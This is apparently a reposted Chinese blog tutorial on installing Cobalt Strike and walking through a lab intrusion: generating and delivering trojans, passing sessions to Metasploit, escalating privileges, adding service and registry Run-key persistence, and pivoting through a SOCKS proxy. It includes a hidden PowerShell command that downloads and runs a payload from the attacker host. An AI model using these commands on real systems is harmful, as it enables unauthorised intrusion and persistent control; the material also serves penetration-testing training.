【工具】Cobalt Strile安装及简单使用
作者:互联网
简介
Cobalt Strike 一款以Metasploit为基础的GUI框架式渗透测试工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,exe、powershell木马生成等。
Cobalt Strike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,windows exe 木马生成,windows dll 木马生成,java 木马生成,office 宏病毒生成,木马捆绑。钓鱼攻击包括:站点克隆,目标信息获取,java 执行,浏览器自动攻击等等强大的功能!
安装
环境
服务端:kali(192.168.1.28)
客户端:Win10
服务端
将文件上传到kali中
进入cs4.0中文
目录输入命令
./teamserver [kali-ip] [密码]
客户端
进入文件夹双击客户端启动脚本
**主机:**为我们刚刚建立服务器的IP地址
**端口:**端口不用管 默认就可以
**用户名:**随意都行 (默认就可以)
**密码:**输入刚才服务端密码
检查指纹
成功连接
软件说明
每个按钮的意思
演示实例
环境
攻击机:kali(192.168.1.28)
边缘主机:Win7(192.168.1.8、10.10.10.2)
内网主机:Winxp(10.10.10.3)
实例
创建监听
创建木马
选择监听器
选择木马保存路径
开启web服务
选择刚刚生成的木马文件
在靶机运行木马
靶机成功上线
联动MSF(shell)
MSF开启监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.183.147
set lport 4444
run
创建两个监听器,一个使用windows/beacon_http/reverse_http来监听肉鸡,另一个使用windows/foreign/reverse_http来将获取到的控制权传给msf(注意:这里的端口要与msf监听的端口一致)
当目标上线后,选择目标点击鼠标右键选择增加会话
获取到的会话不稳定
提权
选中目标点击鼠标右键选择执行->提权
选择监听器
提权成功
权限维持
点击攻击->钓鱼攻击->script web delivery
选择监听器
点击开始生成如下命令
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.28:80/a'))"
在靶机上执行上面生成的命令会上线具有普通用户权限的主机
提权之后打开beacon shell并执行命令
shell sc create "name" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.183.28:80/a'))\""
在靶机上查看服务
将服务改为自动
shell sc config "name" start= auto
当靶机重启后依旧可以拿到权限
注册表后门
点击攻击->生成后门->windows executable
设置监听
保存到桌面
上传木马文件,选择会话点击鼠标右键选择目标->文件管理
选择木马文件进行上传
设置为注册表后门
shell reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "keyname" /t REG_SZ /d "C:\Users\aa\Desktop\artifact.exe" /f
也可以选择将exe设置为服务后门
shell sc create "exe" binpath= "C:\Users\abc\Desktop\artifact.exe"
设置Socks代理
开启socks4a代理,通过代理进行内网渗透
开启socks,可以通过命令,也可以通过右键选择中转->SOCKS Server
socks 12345
编辑proxychains.conf
,在文件末尾添加socks4代理服务器
vi /etc/proxychains.conf
使用proxychains代理扫描内网主机,socks4的代理,只能使用tcp协议,所以nmap使用的时候要使用-sT选择使用tcp协议,要使用-Pn不使用ICMP的ping确认主机存活
proxychains nmap -sT -Pn 10.10.10.0/24
可以判断出是存在主机10.10.10.3的,对内网主机10.10.10.3进行端口扫描
proxychains nmap -sT -Pn 10.10.10.3
联动MSF(扫描)
点击视图->代理信息->选择Socks4a Proxy,点击Tunnel
启动MSF输入方框中的内容
setg Proxies socks4:192.168.1.28:12345
扫描
标签:exe,Strile,端口,192.168,Cobalt,选择,木马,10.10,安装 来源: https://blog.csdn.net/qq_44276741/article/details/122249607